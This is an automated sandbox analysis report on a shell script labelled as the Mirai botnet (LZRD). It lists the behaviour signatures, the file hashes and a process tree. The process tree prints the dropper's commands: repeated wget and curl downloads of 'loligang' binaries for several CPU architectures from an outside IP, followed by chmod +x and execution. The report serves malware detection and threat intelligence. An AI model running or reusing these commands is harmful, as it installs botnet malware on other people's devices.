Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    23-12-2024 06:19

General

  • Target

    Pemex.sh

  • Size

    1KB

  • MD5

    e18ba04d72384ac85e6117c774f6d4f9

  • SHA1

    6cb8e9a2da2db042da0875a08f43cc867b8a2c5b

  • SHA256

    289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e

  • SHA512

    3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (73374) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 8 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 8 IoCs
  • Modifies Watchdog functionality 1 TTPs 14 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 7 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads system network configuration 1 TTPs 7 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 17 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Pemex.sh
    /tmp/Pemex.sh
    1⤵
    • Writes file to tmp directory
    PID:705
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:732
    • /bin/cat
      cat loligang.x86
      2⤵
      PID:734
    • /bin/chmod
      chmod +x awoo loligang.x86 Pemex.sh systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-LGu9q4
      2⤵
      • File and Directory Permissions Modification
      PID:735
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      PID:736
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:738
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:752
    • /bin/cat
      cat loligang.mips
      2⤵
      • System Network Configuration Discovery
      PID:777
    • /bin/chmod
      chmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-LGu9q4
      2⤵
      • File and Directory Permissions Modification
      PID:779
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:780
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.mpsl
      2⤵
      • Writes file to tmp directory
      PID:787
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
      2⤵
      • Writes file to tmp directory
      PID:801
    • /bin/chmod
      chmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:805
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:806
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.arm4
      2⤵
      PID:813
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
      2⤵
      • Writes file to tmp directory
      PID:814
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:816
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:817
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.arm5
      2⤵
      • Writes file to tmp directory
      PID:824
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
      2⤵
      • Writes file to tmp directory
      PID:825
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:827
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:828
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.arm6
      2⤵
      • Writes file to tmp directory
      PID:835
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:836
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:848
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:849
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.arm7
      2⤵
      • Writes file to tmp directory
      PID:854
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
      2⤵
      • Writes file to tmp directory
      PID:863
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:873
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:874
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.ppc
      2⤵
      • Writes file to tmp directory
      PID:878
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
      2⤵
      • Writes file to tmp directory
      PID:888
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:890
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:891
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.m68k
      2⤵
      • Writes file to tmp directory
      PID:895
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
      2⤵
      • Reads runtime system information
      PID:899

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/awoo

    Filesize

    87KB

    MD5

    5f6d2539a443501c888fc90986479ee6

    SHA1

    1f1ce02f9cafc0e684559cd7e36170d6cba370dc

    SHA256

    5775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137

    SHA512

    3bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198

  • /tmp/loligang.x86

    Filesize

    64KB

    MD5

    2354f2531c0bf296738fa7733c42785f

    SHA1

    86508e4ee74c70bf226f6666bf227a12be69dcad

    SHA256

    3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93

    SHA512

    eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679